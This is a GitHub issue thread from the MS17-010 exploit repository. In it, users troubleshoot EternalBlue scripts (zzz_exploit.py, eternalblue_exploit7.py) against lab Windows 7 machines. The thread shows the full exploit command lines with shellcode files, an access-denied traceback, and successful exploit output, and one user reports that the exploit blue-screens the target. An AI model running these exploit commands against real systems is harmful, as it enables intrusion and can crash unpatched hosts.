worawit / MS17-010

zzz_exploit.py can't work properly but eternalblue_exploit7.py works well, tested on win7_x64 #6

Closed greathackerchen closed 7 years ago

greathackerchen commented 7 years ago

root@kali:~/MS17-010# ./zzz_exploit.py 192.168.111.129 shellcode/sc_all.bin
Target OS: Windows 7 Ultimate 7600
Traceback (most recent call last):
  File "./zzz_exploit.py", line 954, in <module>
    exploit(target, pipe_name)
  File "./zzz_exploit.py", line 795, in exploit
    if not info['method'](conn, pipe_name, info):
  File "./zzz_exploit.py", line 469, in exploit_matched_pairs
    fid = conn.nt_create_andx(tid, pipe_name)
  File "/root/MS17-010/mysmb.py", line 170, in nt_create_andx
    self._last_fid = smb.SMB.nt_create_andx(self, tid, filename, smb_packet, cmd, shareAccessMode, disposition, accessMask)
  File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3741, in nt_create_andx
    if smb.isValidAnswer(SMB.SMB_COM_NT_CREATE_ANDX):
  File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 712, in isValidAnswer
    raise SessionError, ("SMB Library Error", self['ErrorClass'] + (self['_reserved'] << 8), self['ErrorCode'], self['Flags2'] & SMB.FLAGS2_NT_STATUS)
impacket.smb.SessionError: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

root@kali:~/MS17-010# ping 192.168.111.129 -c 1
PING 192.168.111.129 (192.168.111.129) 56(84) bytes of data.
64 bytes from 192.168.111.129: icmp_seq=1 ttl=128 time=0.906 ms
--- 192.168.111.129 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.906/0.906/0.906/0.000 ms

root@kali:~/MS17-010# ./eternalblue_exploit7.py 192.168.111.129 shellcode/sc_all.bin
shellcode size: 2284
numGroomConn: 13
Target OS: Windows 7 Ultimate 7600
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
root@kali:~/MS17-010#

upinarms commented 7 years ago

I am experiencing the same issues as greathackerchen. Plus, the eternalblue_exploit7.py definitely blue screens my Windows 7 64-bit system.

root@lostpup:/opt/MS17-010# ./eternalblue_exploit7.py 192.168.169.130 shellcode/eternalblue_kshellcode_x64.asm
shellcode size: 20305
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
root@lostpup:/opt/MS17-010#

worawit commented 7 years ago

This one is a support issue.